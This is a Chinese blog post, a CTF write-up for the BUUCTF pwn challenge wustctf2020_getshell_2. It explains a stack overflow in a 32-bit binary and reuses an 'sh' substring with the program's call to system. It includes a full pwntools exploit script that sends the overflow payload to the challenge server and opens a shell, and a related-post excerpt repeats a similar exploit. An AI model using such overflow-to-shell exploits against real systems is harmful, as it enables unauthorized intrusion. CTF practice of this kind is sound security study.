BUUCTF pwn——wustctf2020_getshell_2

最新推荐文章于 2024-02-07 03:42:45 发布
最新推荐文章于 2024-02-07 03:42:45 发布
阅读量100 收藏
点赞数
分类专栏: [个人向]做题练习WP 文章标签: PWN CTF 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45770420/article/details/130819428
版权

checksec && 运行

在这里插入图片描述

ida

main函数里的vulnerable函数存在溢出

在这里插入图片描述

存在名为shell的函数

system的命令不能直接执行,但是最后的sh字符串可以提取出来作为参数传给system
在这里插入图片描述
找到字符串的位置,按U键拆开,将s的地址作为sh的地址传进去,会自动识别到结束,也就是将sh整个传进去
在这里插入图片描述在这里插入图片描述

给输入分配的栈空间为0x18

在这里插入图片描述

利用思路

ret2text

代码

'''
@Author       : 白银
@Date         : 2023-05-23 08:40:48
@LastEditors  : 白银
@LastEditTime : 2023-05-23 08:56:32
@FilePath     : /pwn/wustctf2020_getshell_2.py
@Description  : https://buuoj.cn/challenges#wustctf2020_getshell_2
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *
# from libcfind import *

set_arch = 2 # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './wustctf2020_getshell_2'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 26019)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        # libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
    else:
        # libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    # libc = elf.libc
    # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
    libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

padding = 0x1c # ida看,buf和r差多少
call_system = 0x8048529 # 程序已经写好了system,直接用就行
bin_sh_addr = 0x8048670 # 替换原本的system参数

payload = flat(['a' * padding, call_system, bin_sh_addr]) # 只要用system执行一些简单的命令,不需要额外操作,可以直接将sh作为参数传给system,不必中间添加返回地址

io.sendline( payload)

io.interactive()

拿到shell,cat flag

在这里插入图片描述

Captain杰派罗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf wustctf2020_getshell_2 ret2shellcode
weixin_45441024的博客
12-01 612
BUUCTF wustctf2020_getshell_2 check一下,32位的程序且没有开任何保护 用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节 这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe
wustctf2020_getshell_2
z1r0的博客
12-20 233
wustctf2020_getshell_2 查看保护 溢出,还有一个shell函数 有了system没有/bin/sh,看到shell里面其实有sh,所以ropgadget拿到sh的地址,rop即可。 exp的system的地址填上call system的那个地址,plt的system没有用。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1
[buuctf]wustctf2020_getshell_2
逆向萌新的博客
07-03 284
[buuctf]wustctf2020_getshell_2
pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)
最新发布
qq_66013948的博客
02-07 477
Linux下查找文件(find、grep命令)_linux查找文件-CSDN博客find 路径 -name "文件名"之后就是根据题目猜测flag文件的名字,最后通过上一条语句进行查找,当然,如果猜不到,那么还是只有挨个找了。
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
[BUUCTF-pwn]——wustctf2020_getshell_2
Y_peak的博客
03-19 391
[BUUCTF-pwn]——wustctf2020_getshell_2 有system没有sh。所以找一下 exploit from pwn import * p = remote('node3.buuoj.cn',25464) sh = 0x08048670 payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) p.sendline(payload) p.interactive()
[BUUCTF]PWN——wustctf2020_getshell1/2
mcmuyanga的博客
11-11 1125
wustctf2020_getshell 附件 步骤: 例行检查,32位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞,正好溢出8位,让我们覆盖到ret exp: from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B
WUST-CTF 2020 WriteUp
weixin_45883223的博客
03-30 3047
WUST-CTF 2020 WriteUp前言WebcheckinadminCV Maker朴实无华Crypto大数运算情书B@sebabyrsa佛说:只能四天MiscSpace ClubWelcome爬Find megirlfriendShopReverseCr0ssFunlevel1 前言 又一次被“面向萌新,题目友好”给骗了,我还是tcl。 Web checkin 打开链接发现要提交作者的名...
WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP
weixin_45461609的博客
03-30 3518
WUST-CTF2020Webcheck inadmin(不会web勉强做出)PWNgetshellgetshell2number gameCrypto大数运算B@se情书babyrsa佛说:只能四天MISC比赛规则Space ClubWelcomegirlfriend爬ShopRECr0ssFunlevel1level2level3 Web check in 修改maxlength,删除按钮的d...
WUST-CTF2020-WP
夏日 の blog
03-29 5269
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
buuctf刷题 system参数取后面部分 shellcode House of Force 格式化泄漏base和libc unlink
carol2358的博客
07-19 498
wustctf2020_getshell_2 wustctf2020_getshell_2 有system和奇怪的参数,用参数的后面部分sh就好 ida里按g可以找地址 exp: from pwn import * from LibcSearcher import * local_file = './wustctf2020_getshell_2' local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so' remote_libc =
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Captain杰派罗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值